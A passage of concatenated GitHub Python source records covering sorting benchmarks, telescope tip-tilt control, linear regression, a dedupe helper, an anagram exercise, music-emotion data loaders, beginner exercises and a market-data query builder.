counting sort for every digit. Note that instead\n # of passing digit number, exp is passed. 
exp is 10^i\n # where i is current digit number\n exp = 1\n while max1/exp > 0:\n countingSort(arr,exp)\n exp *= 10\n\nTestAndPlotAlgorithm(SelectionSort)\nTestAndPlotAlgorithm(HeapSort)\nTestAndPlotAlgorithm(radixSort)\nplt.show()\nplt.show()\n","repo_name":"SuvakovSrdjan/PAZadatak1","sub_path":"Zadatak1.py","file_name":"Zadatak1.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74482051249","text":"import ktl\n\nfrom kpf.KPFTranslatorFunction import KPFTranslatorFunction\nfrom kpf import (log, KPFException, FailedPreCondition, FailedPostCondition,\n FailedToReachDestination, check_input)\n\n\nclass ShutdownTipTilt(KPFTranslatorFunction):\n '''Shutdown the tip tilt system by setting the control mode to open loop\n and setting the target values in X and Y to 0.\n \n ARGS:\n =====\n None\n '''\n @classmethod\n def pre_condition(cls, args, logger, cfg):\n pass\n\n @classmethod\n def perform(cls, args, logger, cfg):\n kpfguide = ktl.cache('kpfguide')\n kpfguide['TIPTILT_CONTROL'].write('Inactive')\n kpfguide['TIPTILT_CALC'].write('Inactive')\n kpffiu = ktl.cache('kpffiu')\n tthome = ktl.cache('kpfguide', 'TIPTILT_HOME')\n home = tthome.read(binary=True)\n log.debug(f'Sending Tip tilt mirror to home: {home[0]} {home[1]}')\n kpffiu['TTXVAX'].write(home[0])\n kpffiu['TTYVAX'].write(home[1])\n log.debug('Opening tip tilt mirror servo loops')\n kpffiu['TTXSRV'].write('open')\n kpffiu['TTYSRV'].write('open')\n\n @classmethod\n def post_condition(cls, args, logger, cfg):\n timeout = cfg.getfloat('times', 'tip_tilt_move_time', fallback=0.1)\n success1 = ktl.waitFor('($kpffiu.TTXSRV == open)', timeout=timeout)\n success2 = ktl.waitFor('($kpffiu.TTYSRV == open)', timeout=timeout)\n if success1 == False or success2 == False:\n raise FailedPostCondition(f'TT{X,Y}SRV did not open')\n","repo_name":"KeckObservatory/KPFTranslator","sub_path":"kpf/fiu/ShutdownTipTilt.py","file_name":"ShutdownTipTilt.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"18287535079","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nLinear Regression with Gradient Descent\nAuthor: dowusu\nDate: Aug 24, 2020\n\"\"\"\n\ndef extractData():\n \"\"\"\n Extracts two-column data from file and returns two arrays.\n \"\"\"\n data_file = open('ex1data1.txt', 'r')\n data = [line.split(',') for line in data_file.read().strip().split('\\n')]\n x = np.array([float(entry[0]) for entry in data])\n y = np.array([float(entry[1]) for entry in data])\n return x, y\n\ndef plotLineData(x, y):\n \"\"\"\n Line plots x and y array data.\n \"\"\"\n figure = plt.figure()\n plt.plot(x, y, c='r')\n plt.xlabel('x data')\n plt.ylabel('y data')\n plt.title('Title')\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n\ndef plotScatterData(x, y):\n \"\"\"\n Scatter plots x and y array data.\n \"\"\"\n figure = plt.figure()\n plt.scatter(x, y, c='r', marker='x')\n plt.xlabel('x data')\n plt.ylabel('y data')\n plt.title('Title')\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n\ndef plotLineFit(x, y, theta):\n \"\"\"\n Plots parameter line fit with scatter data.\n \"\"\"\n num_examples = x.shape[0]\n ones = np.ones((num_examples,))\n X = np.vstack((x, ones)).T\n\n x_fit = X[:,0]\n y_fit = X.dot(theta)\n\n figure = plt.figure()\n plt.scatter(x, y, c='r', 
marker='x')\n plt.plot(x_fit, y_fit, c='b')\n plt.xlabel('x data')\n plt.ylabel('y data')\n plt.title('Title')\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n\n return X\n\ndef computeCost(X, y, theta, num_examples):\n \"\"\"\n Computes cost for gradient descent (represents how close hypothesis is to\n actual output).\n\n X: design matrix, feature columns and training example rows\n y: output, column vector of training example outputs\n theta: parameters that determine hypothesis (predicted output)\n num_examples: number of training examples\n \"\"\"\n hypothesis = X.dot(theta)\n return 1 / (2 * num_examples) * sum((hypothesis - y)**2)\n\ndef updateTheta(X, y, theta, learning_rate, num_examples):\n \"\"\"\n Updates parameter values using gradient descent formula.\n\n X: design matrix, feature columns and training example rows\n y: output, column vector of training example outputs\n theta: parameters that determine hypothesis (predicted output)\n learning_rate: determines step size for computing new theta values\n num_examples: number of training examples\n \"\"\"\n hypothesis = X.dot(theta)\n theta = theta - (learning_rate / num_examples) \\\n * (X.transpose().dot((hypothesis - y)))\n return theta\n\ndef gradientDescent(x, y):\n \"\"\"\n For linear regression, performs gradient descent for hard-coded number of\n iterations.\n\n x: array, one-variable input data (training data input)\n y: array, one-variable output data (training data output)\n \"\"\"\n num_examples = x.shape[0]\n\n ones = np.ones((num_examples,))\n X = np.vstack((x, ones)).T\n theta = np.zeros((2,1))\n y = y.reshape(num_examples, 1) \n \n num_iterations = 1500\n learning_rate = 0.01\n\n cost_array = np.array([])\n for i in range(num_iterations):\n theta = updateTheta(X, y, theta, learning_rate, num_examples)\n cost = computeCost(X, y, theta, num_examples)\n cost_array = np.append(cost_array, cost)\n print(\"Cost: %s\" % cost)\n return cost_array, theta \n\nif __name__ == \"__main__\":\n x, y = extractData()\n plotScatterData(x, y)\n cost_array, theta = gradientDescent(x, y)\n X = plotLineFit(x, y, theta)\n plotLineData(range(len(cost_array)), cost_array)\n","repo_name":"dowusu-antwi/ml-tools","sub_path":"linear-regression/linear-regression.py","file_name":"linear-regression.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34263100578","text":"#当对象是不可哈希的序列时,想要在其中去除重复项\n#这里的key的作用是指定一个函数用来将序列中的元素转换为可哈希的类型,这么做的目的是为了检测重复项\ndef dedupe(items, key=None):\n\tseen = set()\n\tfor item in items:\n\t\tval = item if key is None else key(item)\n\t\tif val not in seen:\n\t\t\tyield item\n\t\t\tseen.add(val)\n\na = [{'x':1, 'y':2}, {'x':1, 'y':3}, {'x':1, 'y':2},{'x':2, 'y':4}]\nprint(list(dedupe(a, key=lambda d: (d['x'],d['y']))))","repo_name":"skyofstars-ice/PythonCookbook","sub_path":"第1章 数据结构与算法/1.10 从序列中移除重复项且保持元素间顺序不变/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25985814563","text":"# challenge from hackerrank https://www.hackerrank.com/challenges/ctci-making-anagrams\n\ns1 = input('Enter first word: ')\ns2 = input('Enter second word: ')\n\ns1_encoded = {}\ns2_encoded = {}\n\ncharacters_deleted = 0\n\nfor i in s1:\n if i in s1_encoded:\n s1_encoded[i] += 1\n else:\n s1_encoded[i] = 1\n\nfor i in s2:\n if i in s2_encoded:\n s2_encoded[i] += 1\n else:\n 
s2_encoded[i] = 1\n\nfor i in s1_encoded:\n if i not in s2_encoded:\n characters_deleted += s1_encoded[i]\n\nfor i in s2_encoded:\n if i not in s1_encoded:\n characters_deleted += s2_encoded[i]\n else:\n characters_deleted += abs(s1_encoded[i] - s2_encoded[i])\n\nprint(characters_deleted)\n","repo_name":"KyriakosMilad/algorithms","sub_path":"hackerrank/makeAnagram/makeAnagram.py","file_name":"makeAnagram.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"71446478131","text":"import numpy as np\nfrom pandas import DataFrame\nimport os\n\nfrom utility.mkdir_p import mkdir_p\n# Default paths to the mirexdatabase files\nfilename_metadata = \"../mirexdatabase/annotations/songs_info.csv\"\nfile_arousal = \"../mirexdatabase/annotations/arousal_cont_average.csv\"\nfile_arousal_std = \"../mirexdatabase/annotations/arousal_cont_std.csv\"\nfile_valence = \"../mirexdatabase/annotations/valence_cont_average.csv\"\nfile_valence_std = \"../mirexdatabase/annotations/valence_cont_std.csv\"\n\npath_to_default_features = \"../mirexdatabase/default_features/\"\n\n\ndef load_csv_directory(csv_directory=path_to_default_features):\n \"\"\"\n :return: Numpy matrix containing the features Shape: [num_files, num_rows, num_columns]\n \"\"\"\n feature_sets = []\n # sorted list of files in csv directory\n list_csv = os.listdir(csv_directory)\n list_csv.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))\n\n for i in list_csv:\n # print('Load_csv_directory: Loading file', csv_directory+i)\n feature_sets.append(np.genfromtxt(csv_directory + i, delimiter=';', skip_header=1))\n\n feature_sets = np.stack(feature_sets)\n print('Stacked features shape: ', feature_sets.shape)\n\n return feature_sets\n\n\ndef generate_metadata(infofile=filename_metadata):\n \"\"\"\n Fetches es the meta data from the mirex database\n :return: Panda Dataframe containing all the data where text entries have been changed to numeric values\n \"\"\"\n meta_data = DataFrame.from_csv(infofile)\n meta_data.reset_index(level=0, inplace=True)\n\n mapping = {'Genre': {'\\tBlues\\t': 0, '\\tClassical\\t': 1, '\\tCountry\\t': 2,\n '\\tElectronic\\t': 3, '\\tFolk\\t': 4, '\\tJazz\\t': 5, '\\tPop\\t': 6, '\\tRock\\t': 7},\n 'Mediaeval 2013 set': {'development': 0, 'evaluation': 1}\n }\n meta_data = meta_data.replace(mapping)\n\n return meta_data\n\n\ndef get_validation_data(dataframe):\n \"\"\" Gets the mirex validation set feature files \"\"\"\n df = dataframe\n eval_set = df.loc[df['Mediaeval 2013 set'] == 1]\n return eval_set\n\n\ndef get_labels_valence(file=file_valence):\n \"\"\" Gets the valence labels from the mirex database. \"\"\"\n valence_labels = np.genfromtxt(file, delimiter=',', skip_header=1)\n return valence_labels[:, 1:]\n\n\ndef get_labels_arousal(file=file_arousal):\n \"\"\" Gets the arousal labels from the mirex database. \"\"\"\n arousal_labels = np.genfromtxt(file, delimiter=',', skip_header=1)\n return arousal_labels[:, 1:]\n\n\ndef get_std_arousal(file=file_arousal_std):\n \"\"\" Gets the arousal standard deviation from the mirex database. \"\"\"\n arousal_std = np.genfromtxt(file, delimiter=',', skip_header=1)\n return arousal_std[:, 1:]\n\n\ndef get_std_valence(file=file_valence_std):\n \"\"\" Gets the valence standard deviation from the mirex database. 
\"\"\"\n valence_std = np.genfromtxt(file, delimiter=',', skip_header=1)\n return valence_std[:, 1:]\n\n\ndef combine_features_labels_to_csv(path=path_to_default_features, arousal=file_arousal, valence=file_valence,\n arousal_std=file_arousal_std, valence_std=file_valence_std):\n \"\"\" Combines the features and labels into one file. \"\"\"\n save_path = '../data/ComParE_2016_fsize200_fstep100/'\n mkdir_p(save_path)\n\n list_csv = os.listdir(path)\n list_csv.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))\n arousal = get_labels_arousal(arousal)\n arousal_std = get_std_arousal(arousal_std)\n valence = get_labels_valence(valence)\n valence_std = get_std_valence(valence_std)\n\n corrupted_list = []\n\n i = 0\n for file in list_csv:\n feature_set = np.genfromtxt(path + file, delimiter=';', skip_header=1)\n # 148 at 14,8 seconds\n combined = combine_file(feature_set[148::5, 2:],\n arousal[i, :-1].reshape(-1, 1),\n valence[i, :-1].reshape(-1, 1),\n arousal_std[i, :-1].reshape(-1, 1),\n valence_std[i, :-1].reshape(-1, 1))\n\n if combined is not None:\n print(\"Saving file: \", file, 'Number: ', i)\n np.savetxt(save_path + file, combined, delimiter=',')\n else:\n print('Dimensionality Error probably due to corrupted wave in file:', file)\n corrupted_list.append(file)\n\n i = i+1\n\n print('Corrupted: ', corrupted_list)\n\n\ndef combine_features_repeated_labels_to_csv(arousal=file_arousal, valence=file_valence,\n arousal_std=file_arousal_std, valence_std=file_valence_std):\n \"\"\"\n Combines the features and labels into one file, while repeating the labels n times with n\n being the number of samples per label.\n \"\"\"\n\n save_path = '../data/ComParE_2016_fsize200_fstep100_repeat/'\n path = '../features/ComParE_2016_fsize200_fstep100/'\n mkdir_p(save_path)\n\n list_csv = os.listdir(path)\n list_csv.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))\n arousal = get_labels_arousal(arousal)\n arousal_std = get_std_arousal(arousal_std)\n valence = get_labels_valence(valence)\n valence_std = get_std_valence(valence_std)\n\n corrupted_list = []\n\n i = 0\n for file in list_csv:\n feature_set = np.genfromtxt(path + file, delimiter=';', skip_header=1)\n # 148 at 14,8 seconds\n combined = combine_file(feature_set[148:, 2:],\n arousal[i, :-1].repeat(5).reshape(-1, 1),\n valence[i, :-1].repeat(5).reshape(-1, 1),\n arousal_std[i, :-1].repeat(5).reshape(-1, 1),\n valence_std[i, :-1].repeat(5).reshape(-1, 1))\n\n if combined is not None:\n print(\"Saving file: \", file, 'Number: ', i)\n np.savetxt(save_path + file, combined, delimiter=',')\n else:\n print('Dimensionality Error probably due to corrupted wave in file:', file)\n corrupted_list.append(file)\n\n i = i + 1\n print('Corrupted: ', corrupted_list)\n\n\ndef combine_file(feature_set, arousal, valence, arousal_std, valence_std):\n print('feature set shape: ', feature_set.shape)\n print('Labels shape:', arousal.shape)\n\n try:\n combined = np.concatenate((feature_set,\n arousal,\n valence,\n arousal_std,\n valence_std), axis=1)\n print(\"combined shape: \", combined.shape)\n return combined\n except ValueError:\n return None\n","repo_name":"clangenb/rt-amaf-viewer","sub_path":"data/mirex_data_handlers.py","file_name":"mirex_data_handlers.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"1590974074","text":"\"\"\"\nExercício triplo sobre condições\n\nFaça um programa que peça ao usuário para digitar um número inteiro,\ninforme se este 
número é par ou ímpar. Caso o usuário não digite um número\ninteiro, informe que não é um número inteiro.\n\"\"\"\nwhile True:\n entrada = input('Digite um número inteiro: ')\n if entrada.isdigit():\n entrada_int = int(entrada)\n par_impar = entrada_int % 2 == 0\n par_impar_texto = 'ímpar'\n\n if par_impar:\n par_impar_texto = 'par'\n\n print(f'O número {entrada_int} é {par_impar_texto}')\n break\n else:\n print('Você não digitou um número inteiro!')\n\n\"\"\"\nFaça um programa que pergunte a hora ao usuário e, baseando-se no horário \ndescrito, exiba a saudação apropriada. Ex. \nBom dia 0-11, Boa tarde 12-17 e Boa noite 18-23.\n\"\"\"\nwhile True:\n question_hours = input('Que horas são? ')\n if len(question_hours) == 5 and \\\n question_hours[2] == ':' and \\\n question_hours[:2].isnumeric() and \\\n question_hours[3:].isnumeric():\n hours = int(question_hours[:2])\n minutes = int(question_hours[3:])\n if hours >= 0 and hours <= 23 \\\n and minutes >= 0 and minutes <= 59:\n if question_hours >= '00:00' and question_hours <= '11:59':\n print('Bom dia!')\n elif question_hours >= '12:00' and question_hours <= '17:59':\n print('Boa tarde!')\n else:\n print('Boa noite!')\n break\n else:\n print('Horário inválido. Digite um horário entre 00:00 e 23:59.')\n else:\n print('Formato de hora inválido. Use o seguinte formato: XX:XX')\n\n\"\"\"\nFaça um programa que peça o primeiro nome do usuário. Se o nome tiver 4 letras ou \nmenos escreva \"Seu nome é curto\"; se tiver entre 5 e 6 letras, escreva \n\"Seu nome é normal\"; maior que 6 escreva \"Seu nome é grande\". \n\"\"\"\nwhile True:\n nome = input('Digite seu primeiro nome: ')\n tamanho = len(nome)\n\n if tamanho <= 4:\n print('Seu nome é curto.')\n elif 5 <= tamanho <= 6:\n print('Seu nome é normal.')\n elif 7 <= tamanho <= 11:\n print('Seu nome é grande.')\n else:\n print('Nome inválido para consulta.')\n if not nome:\n print('Você não digitou nenhum nome.')\n continue\n break","repo_name":"gustavof04/curso-python-3","sub_path":"exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28330405286","text":"from __future__ import annotations\nfrom typing import List, Optional\nfrom urllib import parse\nfrom Artesian.Exceptions import ArtesianSdkException\nfrom Artesian._ClientsExecutor.RequestExecutor import _RequestExecutor\nfrom Artesian._ClientsExecutor.Client import _Client\nfrom .DefaultPartitionStrategy import DefaultPartitionStrategy\nfrom ._Query import _Query\nfrom Artesian.Query._QueryParameters.QueryParameters import (\n _FillCustomTimeserieStrategy,\n _FillLatestStrategy,\n _NoFillStrategy,\n _NullFillStrategy,\n)\nfrom ._QueryParameters.VersionedQueryParameters import VersionedQueryParameters\nfrom ._QueryParameters.VersionSelectionType import VersionSelectionType\nfrom .RelativeInterval import RelativeInterval\nfrom Artesian.MarketData import Granularity\n\n\nclass VersionedQuery(_Query):\n __routePrefix = \"vts\"\n\n def __init__(\n self: VersionedQuery,\n client: _Client,\n requestExecutor: _RequestExecutor,\n partitionStrategy: DefaultPartitionStrategy,\n ) -> None:\n \"\"\"Inits _VersionedQuery\"\"\"\n\n queryParameters = VersionedQueryParameters()\n _Query.__init__(self, client, requestExecutor, queryParameters)\n self._queryParameters = queryParameters\n self.__partition = partitionStrategy\n\n def forMarketData(self: VersionedQuery, ids: List[int]) -> VersionedQuery:\n \"\"\"Set the list 
of marketdata to be queried.\n\n Args:\n ids: list of marketdata id's to be queried. Ex.: 100000xxx\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._forMarketData(ids)\n return self\n\n def forFilterId(self: VersionedQuery, filterId: int) -> VersionedQuery:\n \"\"\"Sets the list of filtered marketdata id to be queried\n\n Args:\n filterId: marketdata filtered by id\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._forFilterId(filterId)\n return self\n\n def inTimeZone(self: VersionedQuery, tz: str) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a specific TimeZone in IANA format.\n\n Args:\n timezone: \"UTC\",\"CET\",\"Europe/Istanbul\"\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inTimezone(tz)\n return self\n\n def inAbsoluteDateRange(\n self: VersionedQuery, start: str, end: str\n ) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in an absolute date range window.\n The Absolute Date Range is in ISO8601 format.\n\n Args:\n start: string for the date start of the range of extracted timeserie,\n in ISO format. (ex.: \"2022-01-01\")\n end: string for the EXCLUSIVE date end of the range of extracted timeserie,\n in ISO format. (ex.: \"2022-01-01\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inAbsoluteDateRange(start, end)\n return self\n\n def inRelativePeriodRange(\n self: VersionedQuery, pStart: str, pEnd: str\n ) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a relative period range time window.\n\n Args:\n pStart: string for the relative period start of the range of extracted\n timeseries. (ex.: \"P--3D\")\n pEnd: string for the relative period end of the range of the extracted\n timeseries. (ex.: \"P10D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inRelativePeriodRange(pStart, pEnd)\n return self\n\n def inRelativePeriod(self: VersionedQuery, extractionPeriod: str) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a relative period of a time window.\n\n Args:\n extractionPeriod: string the relative period of extracted timeseries.\n (ex.: \"P5D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inRelativePeriod(extractionPeriod)\n return self\n\n def inRelativeInterval(\n self: VersionedQuery, relativeInterval: RelativeInterval\n ) -> VersionedQuery:\n \"\"\"Gets the Relative Interval considers a specific interval of time window.\n\n Args:\n relativeInterval: ENUM. the relative interval of extracted timeseries.\n (ex.: \"RelativeInterval.ROLLING_WEEK\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n super()._inRelativeInterval(relativeInterval)\n return self\n\n def withTimeTransform(self: VersionedQuery, tr: str) -> VersionedQuery:\n \"\"\"Gets the Versioned query in a specific Time Transform.\n\n Args:\n tr: \"Custom\",\"GASDAY66\",\"THERMALYEAR\"\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.transformId = tr\n return self\n\n def inGranularity(self: VersionedQuery, granularity: Granularity) -> VersionedQuery:\n \"\"\"Gets the Versioned Query in a specific Granularity.\n\n Args:\n granularity: Enum ex.: \"TenMinute\", \"FifteenMinute\", \"Hour\", \"Year\"\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.granularity = granularity\n return self\n\n def forMUV(\n self: VersionedQuery, versionLimit: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the timeseries of the most updated version of each timepoint of\n a versioned timeseries.\n\n Args:\n versionLimit: string specifying a datetime from which the most updated\n version should be taken, i.e. 
MUV as of (versionLimit).\n Ex.: versionLimit(\"2021-03-12T14:30:00\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionLimit = versionLimit\n self._queryParameters.versionSelectionType = VersionSelectionType.MUV\n return self\n\n def forLastOfDays(\n self: VersionedQuery, start: str, end: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the lastest version of a versioned timeseries of each day\n in a time window..\n\n Args:\n start: string for the start timeseries for last of days.\n ex.: forLastOfDays(\"2021-03-12\",...),forLastOfDays(\"P0Y0M-2D\", ...)\n end: string for the end timeseries for last of days.\n ex.: forLastOfDays(\"2021-03-12\",\"2021-03-16\")\n forLastOfDays(\"P0Y0M-2D\",\"P0Y0M2D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n\n self._queryParameters.versionSelectionType = VersionSelectionType.LastOfDays\n vr = self._queryParameters.versionSelectionConfig.versionsRange\n if start.startswith(\"P\"):\n if end is None:\n vr.period = start\n else:\n vr.periodFrom = start\n vr.periodTo = end\n else:\n vr.dateStart = start\n vr.dateEnd = end\n return self\n\n def forLastOfMonths(\n self: VersionedQuery, start: str, end: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the lastest version of a versioned timeseries of each month\n in a time window.\n\n Args:\n start: string for the start timeseries for last of month.\n ex: forLastOfMonths(\"2021-03-12\",...),forLastOfMonths(\"P0Y-1M0D\",...)\n end: string for the end timeseries for last of month.\n ex: forLastOfMonths(\"2021-03-12\",\"2021-03-16\"),\n forLastOfMonths(\"P0Y-1M0D\",\"P0Y1M0D\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.LastOfMonths\n vr = self._queryParameters.versionSelectionConfig.versionsRange\n if start.startswith(\"P\"):\n if end is None:\n vr.period = start\n else:\n vr.periodFrom = start\n vr.periodTo = end\n else:\n vr.dateStart = start\n vr.dateEnd = end\n return self\n\n def forLastNVersions(self: VersionedQuery, lastN: int) -> VersionedQuery:\n \"\"\"Gets the lastest N timeseries versions that have at least a not-null value .\n\n Args:\n lastN: an int > 0. Ex.: forLastNVersions(2)\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.LastN\n self._queryParameters.versionSelectionConfig.lastN = lastN\n return self\n\n def forVersion(self: VersionedQuery, version: str) -> VersionedQuery:\n \"\"\"Gets the specified version of a versioned timeseries.\n\n Args:\n version: string of a specific version. 
Ex.:forVersion(\"2021-03-12T14:30:00\")\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.Version\n self._queryParameters.versionSelectionConfig.version = version\n return self\n\n def forMostRecent(\n self: VersionedQuery, start: str, end: Optional[str] = None\n ) -> VersionedQuery:\n \"\"\"Gets the most recent version of a versioned timeseries in a time window.\n\n Args:\n start: string for the start of the most recent version.\n Ex.: (forMostRecent(\"2021-03-12\",...))\n\n end: string for the end of the most recent version.\n Ex.: (forMostRecent(\"2021-03-12\",\"2021-03-16\"))\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.versionSelectionType = VersionSelectionType.MostRecent\n vr = self._queryParameters.versionSelectionConfig.versionsRange\n if start.startswith(\"P\"):\n if end is None:\n vr.period = start\n else:\n vr.periodFrom = start\n vr.periodTo = end\n else:\n vr.dateStart = start\n vr.dateEnd = end\n return self\n\n def withFillNull(self: VersionedQuery) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n ex. withFillNull()\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _NullFillStrategy()\n return self\n\n def withFillNone(self: VersionedQuery) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n ex. withFillNone()\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _NoFillStrategy()\n return self\n\n def withFillLatestValue(\n self: VersionedQuery, period: str, continueToEnd: bool = False\n ) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n Args:\n period: string of the last period value to fill in case there are missing\n values. Ex.: withFillLatestValue(\"P5D\")\n continueToEnd: true means the fill extends to the end of the period even\n if there's no value at the end of the period\n false means the fill is only extended to the next valid value\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _FillLatestStrategy(period, continueToEnd)\n return self\n\n def withFillCustomValue(self: VersionedQuery, val: float) -> VersionedQuery:\n \"\"\"Optional filler strategy for the extraction.\n\n Args:\n val: float value to fill in case there are missing values.\n Ex.: .withFillCustomValue(10)\n\n Returns:\n VersionedQuery.\n \"\"\"\n self._queryParameters.fill = _FillCustomTimeserieStrategy(val)\n return self\n\n def execute(self: VersionedQuery) -> list:\n \"\"\"\n Execute the Query.\n\n Returns:\n list of VersionedQuery.\"\"\"\n urls = self.__buildRequest()\n return super()._exec(urls)\n\n async def executeAsync(self: VersionedQuery) -> list:\n \"\"\"\n Execute Async Query.\n\n Returns:\n list of VersionedQuery\"\"\"\n urls = self.__buildRequest()\n return await super()._execAsync(urls)\n\n def __buildRequest(self: VersionedQuery) -> List[str]:\n self.__validateQuery()\n qps = self.__partition.PartitionVersioned([self._queryParameters])\n urls = []\n for qp in qps:\n url = \"/{0}/{1}/{2}/{3}?_=1\".format(\n self.__routePrefix,\n self.__buildVersionRoute(),\n self.__getGranularityPath(qp.granularity),\n super()._buildExtractionRangeRoute(qp),\n )\n if not (qp.ids is None):\n sep = \",\"\n ids = sep.join(map(str, qp.ids))\n enc = parse.quote_plus(ids)\n url = url + \"&id=\" + enc\n if not (qp.filterId is None):\n url = url + \"&filterId=\" + \"qp.filterId\"\n if not (qp.timezone is None):\n url = url + \"&tz=\" + qp.timezone\n if not (qp.transformId is None):\n url = url + 
\"&tr=\" + qp.transformId\n if not (qp.fill is None):\n url = url + \"&\" + qp.fill.getUrlParams()\n if not (qp.versionLimit is None):\n url = url + \"&versionLimit=\" + qp.versionLimit\n urls.append(url)\n return urls\n\n def __validateQuery(self: VersionedQuery) -> None:\n super()._validateQuery()\n if self._queryParameters.granularity is None:\n raise Exception(\n \"Extraction granularity must be provided. Use .InGranularity() \"\n + \"argument takes a granularity type\"\n )\n if self._queryParameters.versionSelectionType is None:\n raise Exception(\n \"Version selection must be provided. Provide a version to query. \"\n + \"eg .ForLastOfDays() arguments take a date range, period or range\"\n )\n\n def __buildVersionRoute(self: VersionedQuery) -> str:\n lastN = f\"Last{self._queryParameters.versionSelectionConfig.lastN}\"\n version = f\"Version/{self._queryParameters.versionSelectionConfig.version}\"\n switcher = {\n VersionSelectionType.LastN: lastN,\n VersionSelectionType.MUV: \"Muv\",\n VersionSelectionType.LastOfDays: \"LastOfDays/\" + self.__buildVersionRange(),\n VersionSelectionType.LastOfMonths: \"LastOfMonths/\"\n + self.__buildVersionRange(),\n VersionSelectionType.MostRecent: \"MostRecent/\" + self.__buildVersionRange(),\n VersionSelectionType.Version: version,\n }\n assert self._queryParameters.versionSelectionType is not None\n vr = switcher.get(self._queryParameters.versionSelectionType, \"VType\")\n if vr == \"VType\":\n raise Exception(\"Not supported VersionType\")\n return vr\n\n def __buildVersionRange(self: VersionedQuery) -> str:\n vr = \"\"\n if (\n self._queryParameters.versionSelectionConfig.versionsRange.dateStart\n is not None\n ) and (\n self._queryParameters.versionSelectionConfig.versionsRange.dateEnd\n is not None\n ):\n vr = \"{0}/{1}\".format(\n self._queryParameters.versionSelectionConfig.versionsRange.dateStart,\n self._queryParameters.versionSelectionConfig.versionsRange.dateEnd,\n )\n elif (\n self._queryParameters.versionSelectionConfig.versionsRange.period\n is not None\n ):\n vr = f\"{self._queryParameters.versionSelectionConfig.versionsRange.period}\"\n elif (\n self._queryParameters.versionSelectionConfig.versionsRange.periodFrom\n is not None\n ) and (\n self._queryParameters.versionSelectionConfig.versionsRange.periodTo\n is not None\n ):\n vr = \"{0}/{1}\".format(\n self._queryParameters.versionSelectionConfig.versionsRange.periodFrom,\n self._queryParameters.versionSelectionConfig.versionsRange.periodTo,\n )\n return vr\n\n def __getGranularityPath(\n self: VersionedQuery, granularity: Optional[Granularity]\n ) -> str:\n switcher = {\n Granularity.Day: \"Day\",\n Granularity.FifteenMinute: \"FifteenMinute\",\n Granularity.Hour: \"Hour\",\n Granularity.Minute: \"Minute\",\n Granularity.Month: \"Month\",\n Granularity.Quarter: \"Quarter\",\n Granularity.TenMinute: \"TenMinute\",\n Granularity.ThirtyMinute: \"ThirtyMinute\",\n Granularity.Week: \"Week\",\n Granularity.Year: \"Year\",\n }\n if granularity is None:\n raise ArtesianSdkException(\n \"Missing Granularity. 
